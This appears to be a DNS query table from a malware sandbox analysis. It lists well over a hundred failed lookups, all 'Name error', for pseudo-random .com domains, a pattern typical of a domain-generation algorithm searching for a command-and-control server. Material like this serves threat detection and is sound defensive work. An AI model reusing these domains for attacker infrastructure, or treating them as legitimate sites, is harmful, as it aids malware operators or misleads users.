                                                                                                                                                                                                          Nov 11, 2024 18:24:27.691596031 CET1.1.1.1192.168.2.80xfe3bName error (3)lyvygyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.153036118 CET1.1.1.1192.168.2.80x575aName error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.154618979 CET1.1.1.1192.168.2.80x696aName error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.156225920 CET1.1.1.1192.168.2.80x591fName error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.158113003 CET1.1.1.1192.168.2.80xf47eName error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.167819023 CET1.1.1.1192.168.2.80x3ffdName error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.172744036 CET1.1.1.1192.168.2.80x2198Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.176136971 CET1.1.1.1192.168.2.80x27b2Name error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.178838015 CET1.1.1.1192.168.2.80x9349Name error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.178996086 CET1.1.1.1192.168.2.80x218aName error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.180125952 CET1.1.1.1192.168.2.80x9c88Name error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181190014 CET1.1.1.1192.168.2.80x1454Name error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.181713104 CET1.1.1.1192.168.2.80x8f8fName error (3)puzyjoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.193423033 CET1.1.1.1192.168.2.80x968bName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.195667982 CET1.1.1.1192.168.2.80xf278Name error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.207741022 CET1.1.1.1192.168.2.80x5314Name error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.213074923 CET1.1.1.1192.168.2.80x7588Name error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.216315031 CET1.1.1.1192.168.2.80x94d9Name error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.275264978 CET1.1.1.1192.168.2.80x3c9aName error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.276806116 CET1.1.1.1192.168.2.80x59fName error (3)qexykaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.277412891 CET1.1.1.1192.168.2.80xebd1Name error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280070066 CET1.1.1.1192.168.2.80x9c8eName error (3)qeqytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280613899 CET1.1.1.1192.168.2.80xffb7Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280755997 CET1.1.1.1192.168.2.80xc996Name error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.280772924 CET1.1.1.1192.168.2.80x2ccaName error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.281085014 CET1.1.1.1192.168.2.80x138aName error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.281294107 CET1.1.1.1192.168.2.80xf022Name error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.282484055 CET1.1.1.1192.168.2.80x87c9Name error (3)qedyveg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.282871008 CET1.1.1.1192.168.2.80xc336Name error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.300831079 CET1.1.1.1192.168.2.80xffedName error (3)volyjok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.301801920 CET1.1.1.1192.168.2.80xecb2Name error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.302582979 CET1.1.1.1192.168.2.80x4c98Name error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.304579973 CET1.1.1.1192.168.2.80x68f2Name error (3)lyxyjaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.305463076 CET1.1.1.1192.168.2.80x4a14Name error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.306380033 CET1.1.1.1192.168.2.80x489fName error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.307849884 CET1.1.1.1192.168.2.80xfacaName error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308090925 CET1.1.1.1192.168.2.80x1099Name error (3)purypol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308191061 CET1.1.1.1192.168.2.80x27a0Name error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308552027 CET1.1.1.1192.168.2.80x90fbName error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.308929920 CET1.1.1.1192.168.2.80x4451Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.309293985 CET1.1.1.1192.168.2.80xef21Name error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.309437990 CET1.1.1.1192.168.2.80x708cName error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.310678005 CET1.1.1.1192.168.2.80x36ceName error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.321921110 CET1.1.1.1192.168.2.80x38afName error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.321935892 CET1.1.1.1192.168.2.80x73f1Name error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.321945906 CET1.1.1.1192.168.2.80xf35aName error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.324130058 CET1.1.1.1192.168.2.80xd027Name error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.325084925 CET1.1.1.1192.168.2.80xfbbName error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.325095892 CET1.1.1.1192.168.2.80x907cName error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.325459003 CET1.1.1.1192.168.2.80x6c94Name error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.326853037 CET1.1.1.1192.168.2.80x21efName error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.329179049 CET1.1.1.1192.168.2.80x15c4Name error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.331619978 CET1.1.1.1192.168.2.80xe266Name error (3)pufybyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.334579945 CET1.1.1.1192.168.2.80x9bb8Name error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.345828056 CET1.1.1.1192.168.2.80x1fe0Name error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.346077919 CET1.1.1.1192.168.2.80xc438Name error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.346884966 CET1.1.1.1192.168.2.80xbc93Name error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.348650932 CET1.1.1.1192.168.2.80x69d7Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.349167109 CET1.1.1.1192.168.2.80xf30Name error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.980839968 CET1.1.1.1192.168.2.80xe002Name error (3)pupypiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.991704941 CET1.1.1.1192.168.2.80x55a4Name error (3)pumylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.998866081 CET1.1.1.1192.168.2.80xbad0Name error (3)purylev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.001317024 CET1.1.1.1192.168.2.80x4131Name error (3)gacynuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.012000084 CET1.1.1.1192.168.2.80xe52dName error (3)ganykaz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.013175964 CET1.1.1.1192.168.2.80xd658Name error (3)lygysij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.017426968 CET1.1.1.1192.168.2.80xea51Name error (3)vowykaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.021698952 CET1.1.1.1192.168.2.80x625cName error (3)vonyket.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022115946 CET1.1.1.1192.168.2.80x6889Name error (3)vonyqok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022424936 CET1.1.1.1192.168.2.80x8161Name error (3)qexynyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.023013115 CET1.1.1.1192.168.2.80x7df0Name error (3)gacyhis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.026285887 CET1.1.1.1192.168.2.80x7973Name error (3)vowyrym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.026302099 CET1.1.1.1192.168.2.80x8b1Name error (3)gaqyreh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.026312113 CET1.1.1.1192.168.2.80x6783Name error (3)lyxygud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.027523041 CET1.1.1.1192.168.2.80xec3dName error (3)puzyguv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.028068066 CET1.1.1.1192.168.2.80x1266Name error (3)pufycol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.028362036 CET1.1.1.1192.168.2.80xe9eName error (3)lygyvar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.029298067 CET1.1.1.1192.168.2.80xcb49Name error (3)gahydoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.029328108 CET1.1.1.1192.168.2.80xb24dName error (3)gatypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.029933929 CET1.1.1.1192.168.2.80x707fName error (3)vocyjic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.030280113 CET1.1.1.1192.168.2.80x6274Name error (3)vojybek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.031307936 CET1.1.1.1192.168.2.80xf68aName error (3)lyrytun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.031496048 CET1.1.1.1192.168.2.80x35eeName error (3)puvyjop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.031565905 CET1.1.1.1192.168.2.80xfb13Name error (3)pujydag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.032454014 CET1.1.1.1192.168.2.80x813Name error (3)lymywaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.033818960 CET1.1.1.1192.168.2.80xeef7Name error (3)vocymut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.037599087 CET1.1.1.1192.168.2.80x75afName error (3)volygyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.038635015 CET1.1.1.1192.168.2.80x294Name error (3)pufypiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.038682938 CET1.1.1.1192.168.2.80xabfName error (3)galyfyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.043041945 CET1.1.1.1192.168.2.80x9258Name error (3)gaqykab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.043469906 CET1.1.1.1192.168.2.80xec51Name error (3)qedysov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.045686007 CET1.1.1.1192.168.2.80x8eName error (3)lykynyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.046120882 CET1.1.1.1192.168.2.80x337bName error (3)qeqyreq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.050121069 CET1.1.1.1192.168.2.80xa5dName error (3)purytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.053309917 CET1.1.1.1192.168.2.80xa648Name error (3)qetytug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113198996 CET1.1.1.1192.168.2.80xd8a5Name error (3)puvymul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.114936113 CET1.1.1.1192.168.2.80x9e8bName error (3)ganyqow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.117965937 CET1.1.1.1192.168.2.80x6517Name error (3)lyvyjox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.121311903 CET1.1.1.1192.168.2.80x36e9Name error (3)gatyzys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.122257948 CET1.1.1.1192.168.2.80xf6d7Name error (3)lyvymir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.122279882 CET1.1.1.1192.168.2.80x31b2Name error (3)qebyqil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.122611046 CET1.1.1.1192.168.2.80xf940Name error (3)vopyzuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.123107910 CET1.1.1.1192.168.2.80xd8a3Name error (3)qegysoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.123119116 CET1.1.1.1192.168.2.80x608Name error (3)pujybyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.123675108 CET1.1.1.1192.168.2.80xea2eName error (3)gahyvew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.124084949 CET1.1.1.1192.168.2.80x860aName error (3)qetylyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.124675989 CET1.1.1.1192.168.2.80xc417Name error (3)vojydam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.125185013 CET1.1.1.1192.168.2.80xa46cName error (3)qedyxip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.126470089 CET1.1.1.1192.168.2.80xe878Name error (3)pumywaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.126589060 CET1.1.1.1192.168.2.80x6d13Name error (3)vopypif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.126604080 CET1.1.1.1192.168.2.80x4158Name error (3)qebykap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.129251003 CET1.1.1.1192.168.2.80xc3c9Name error (3)lyryled.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.135184050 CET1.1.1.1192.168.2.80x7428Name error (3)qekynuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.143798113 CET1.1.1.1192.168.2.80xc53dName error (3)lykyfen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.144097090 CET1.1.1.1192.168.2.80x9a08Name error (3)pupyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.145586014 CET1.1.1.1192.168.2.80x285aName error (3)lysysod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.145596981 CET1.1.1.1192.168.2.80x28b5Name error (3)lysyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.147053003 CET1.1.1.1192.168.2.80xe161Name error (3)qekyfeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.704226017 CET1.1.1.1192.168.2.80x1859Name error (3)lyryjir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.704308987 CET1.1.1.1192.168.2.80x9d84Name error (3)vocybam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.710128069 CET1.1.1.1192.168.2.80xfb63Name error (3)qetykol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.720506907 CET1.1.1.1192.168.2.80xc687Name error (3)lyvynen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.728436947 CET1.1.1.1192.168.2.80xad77Name error (3)gahypus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.729518890 CET1.1.1.1192.168.2.80xbd0cName error (3)puvybeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.741556883 CET1.1.1.1192.168.2.80xd91eName error (3)vojypuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.741946936 CET1.1.1.1192.168.2.80x525Name error (3)pujypup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.743527889 CET1.1.1.1192.168.2.80x9fdaName error (3)gatykow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.750286102 CET1.1.1.1192.168.2.80x1b23Name error (3)lykysix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.751264095 CET1.1.1.1192.168.2.80x44edName error (3)qebynyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.752211094 CET1.1.1.1192.168.2.80x6034Name error (3)pupylaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.767608881 CET1.1.1.1192.168.2.80xd726Name error (3)qekysip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.772641897 CET1.1.1.1192.168.2.80x93d7Name error (3)vopykak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.788172960 CET1.1.1.1192.168.2.80x4ec9Name error (3)qegytyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.868786097 CET1.1.1.1192.168.2.80x5992Name error (3)gaqyqis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.869091034 CET1.1.1.1192.168.2.80x8c15Name error (3)gacyvah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.869491100 CET1.1.1.1192.168.2.80x6097Name error (3)puzydal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.869606972 CET1.1.1.1192.168.2.80xf145Name error (3)galydoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.870810986 CET1.1.1.1192.168.2.80x3fe7Name error (3)vofyzym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.870821953 CET1.1.1.1192.168.2.80x24a6Name error (3)vocygyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.870831013 CET1.1.1.1192.168.2.80x4005Name error (3)qedyleq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.870850086 CET1.1.1.1192.168.2.80x49cName error (3)qetyrap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.871500969 CET1.1.1.1192.168.2.80x47b2Name error (3)gahycib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.871521950 CET1.1.1.1192.168.2.80x9cbbName error (3)vojycif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.872241020 CET1.1.1.1192.168.2.80xc394Name error (3)puvygyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.875031948 CET1.1.1.1192.168.2.80xcffcName error (3)lyvyguj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.875699997 CET1.1.1.1192.168.2.80x8d9Name error (3)vonyjim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.876642942 CET1.1.1.1192.168.2.80xca7fName error (3)lygyxun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.876728058 CET1.1.1.1192.168.2.80xde4bName error (3)gadyzyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.877912998 CET1.1.1.1192.168.2.80x30a4Name error (3)ganyhuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.877996922 CET1.1.1.1192.168.2.80x859Name error (3)galyvas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889008045 CET1.1.1.1192.168.2.80xcf61Name error (3)vowyqoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889559984 CET1.1.1.1192.168.2.80xdca1Name error (3)pufyxug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.890932083 CET1.1.1.1192.168.2.80x48e4Name error (3)vonymuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.893222094 CET1.1.1.1192.168.2.80x19e1Name error (3)vopyret.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.893429995 CET1.1.1.1192.168.2.80x26daName error (3)gadypuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.894125938 CET1.1.1.1192.168.2.80x3a5dName error (3)qegyxug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.896121979 CET1.1.1.1192.168.2.80x1b18Name error (3)puryjil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.899522066 CET1.1.1.1192.168.2.80xe42cName error (3)pumyjig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.915518999 CET1.1.1.1192.168.2.80xd26dName error (3)qebyhuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.919648886 CET1.1.1.1192.168.2.80xbaacName error (3)lymyjon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.920743942 CET1.1.1.1192.168.2.80xedbdName error (3)qeqykog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.929797888 CET1.1.1.1192.168.2.80x7bd7Name error (3)puzybep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.930094957 CET1.1.1.1192.168.2.80x4567Name error (3)vofypuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.932432890 CET1.1.1.1192.168.2.80xbcbbName error (3)pupytyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.932554007 CET1.1.1.1192.168.2.80xa1f9Name error (3)qexyfel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.933824062 CET1.1.1.1192.168.2.80xec44Name error (3)volybec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934043884 CET1.1.1.1192.168.2.80xf22Name error (3)qeqyqiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934782028 CET1.1.1.1192.168.2.80x8755Name error (3)volydot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934961081 CET1.1.1.1192.168.2.80x7e4Name error (3)lykyvod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.939534903 CET1.1.1.1192.168.2.80xf146Name error (3)qekyvav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.941071987 CET1.1.1.1192.168.2.80x6122Name error (3)purywop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.942536116 CET1.1.1.1192.168.2.80x6d14Name error (3)lysylej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.945525885 CET1.1.1.1192.168.2.80x17bcName error (3)lysytyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.951741934 CET1.1.1.1192.168.2.80x47f5Name error (3)qedytul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.952162981 CET1.1.1.1192.168.2.80x16a7Name error (3)lyrywax.comnonenoneA (IP address)IN (0x0001)false
